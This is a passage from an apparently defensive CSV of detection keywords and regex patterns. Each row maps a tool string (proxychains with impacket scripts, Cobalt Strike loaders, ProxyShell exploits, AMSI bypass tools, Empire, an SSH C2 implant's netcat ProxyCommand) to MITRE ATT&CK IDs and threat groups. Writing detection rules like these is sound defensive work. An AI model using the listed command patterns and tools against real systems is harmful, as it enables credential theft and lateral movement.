smb*",".{0,1000}proxychains\scme\ssmb.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*proxychains dcomexec.py*",".{0,1000}proxychains\sdcomexec\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*proxychains nmap -sT * -p * -Pn -A*",".{0,1000}proxychains\snmap\s\-sT\s.{0,1000}\s\-p\s.{0,1000}\s\-Pn\s\-A.{0,1000}","offensive_tool_keyword","ligolo","proxychains used with ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*proxychains nmap*",".{0,1000}proxychains\snmap.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*proxychains psexec.py*",".{0,1000}proxychains\spsexec\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*proxychains rdesktop *",".{0,1000}proxychains\srdesktop\s.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*proxychains secretsdump*",".{0,1000}proxychains\ssecretsdump.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*proxychains smbclient -L *",".{0,1000}proxychains\ssmbclient\s\-L\s.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*proxychains smbexec.py*",".{0,1000}proxychains\ssmbexec\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*proxychains telnet*",".{0,1000}proxychains\stelnet.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*proxychains wmiexec.py*",".{0,1000}proxychains\swmiexec\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*proxychains*scshell*",".{0,1000}proxychains.{0,1000}scshell.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*proxychains.conf*",".{0,1000}proxychains\.conf.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*proxychains.lsm*",".{0,1000}proxychains\.lsm.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*proxychains.sourceforge.net*",".{0,1000}proxychains\.sourceforge\.net.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*proxychains.sourceforge.net*",".{0,1000}proxychains\.sourceforge\.net.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","1","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*proxychains-master*",".{0,1000}proxychains\-master.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","1","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*proxychains-other.conf*",".{0,1000}proxychains\-other\.conf.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","1","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*ProxyCommand=nc -lp 8080 -s 127.0.0.1*",".{0,1000}ProxyCommand\=nc\s\-lp\s8080\s\-s\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*Proxy-DLL-Loads*",".{0,1000}Proxy\-DLL\-Loads.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*proxyDllLoads.c*",".{0,1000}proxyDllLoads\.c.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*proxyDllLoads.exe*",".{0,1000}proxyDllLoads\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*proxyLogon.py*",".{0,1000}proxyLogon\.py.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/RickGeex/ProxyLogon","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*proxyresolv *",".{0,1000}proxyresolv\s.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "*proxyshell.py*",".{0,1000}proxyshell\.py.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*proxyshell_rce.py*",".{0,1000}proxyshell_rce\.py.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*proxyshellcodeurl*",".{0,1000}proxyshellcodeurl.{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","140","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" "*proxyshell-enumerate.py*",".{0,1000}proxyshell\-enumerate\.py.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*proxyshell-poc*",".{0,1000}proxyshell\-poc.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*ps_token2john.py*",".{0,1000}ps_token2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*ps_wmi_exec.rb*",".{0,1000}ps_wmi_exec\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ps2exe -*",".{0,1000}ps2exe\s\-.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*ps2exe *.ps1*.exe*",".{0,1000}ps2exe\s.{0,1000}\.ps1.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","0","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*ps2exe.ps1*",".{0,1000}ps2exe\.ps1.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*ps2exe.psd1*",".{0,1000}ps2exe\.psd1.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*ps2exe.psm1*",".{0,1000}ps2exe\.psm1.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*PS2EXE-master*",".{0,1000}PS2EXE\-master.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","10","1051","184","2023-12-17T09:37:50Z","2019-11-08T09:25:02Z" "*PSAmsiClient.ps1*",".{0,1000}PSAmsiClient\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*PSAmsiScanner.ps1*",".{0,1000}PSAmsiScanner\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*PSAttack*",".{0,1000}PSAttack.{0,1000}","offensive_tool_keyword","PSAttack","PS>Attack combines some of the best projects in the infosec powershell community into a self contained custom PowerShell console. Its designed to make it easy to use PowerShell offensively and to evade antivirus and Incident Response teams. It does this with in a couple of ways.","T1059 - T1112 - T1055 - T1566","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/jaredhaight/PSAttack","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PSByPassCLM*",".{0,1000}PSByPassCLM.{0,1000}","offensive_tool_keyword","PSByPassCLM","Bypass for PowerShell Constrained Language Mode","T1027 - T1059 - T1218 - T1086 - T1089","TA0002 - TA0008 - TA0007","N/A","N/A","Defense Evasion","https://github.com/padovah4ck/PSByPassCLM","1","0","N/A","N/A","4","322","48","2021-12-23T16:29:01Z","2018-09-13T07:27:18Z" "*PSCMD channel was either not defined while connecting OR the channel name is not the default.*",".{0,1000}PSCMD\schannel\swas\seither\snot\sdefined\swhile\sconnecting\sOR\sthe\schannel\sname\sis\snot\sthe\sdefault\..{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*pscmd/serverscript.ps1*",".{0,1000}pscmd\/serverscript\.ps1.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","1","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*pscmd\serverscript.ps1*",".{0,1000}pscmd\\serverscript\.ps1.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*PSconfusion.py*",".{0,1000}PSconfusion\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","786","145","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*pse2john.py*",".{0,1000}pse2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*ps-empire client*",".{0,1000}ps\-empire\sclient.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*ps-empire server*",".{0,1000}ps\-empire\sserver.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*ps-empire*",".{0,1000}ps\-empire.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*psexec.py*",".{0,1000}psexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the 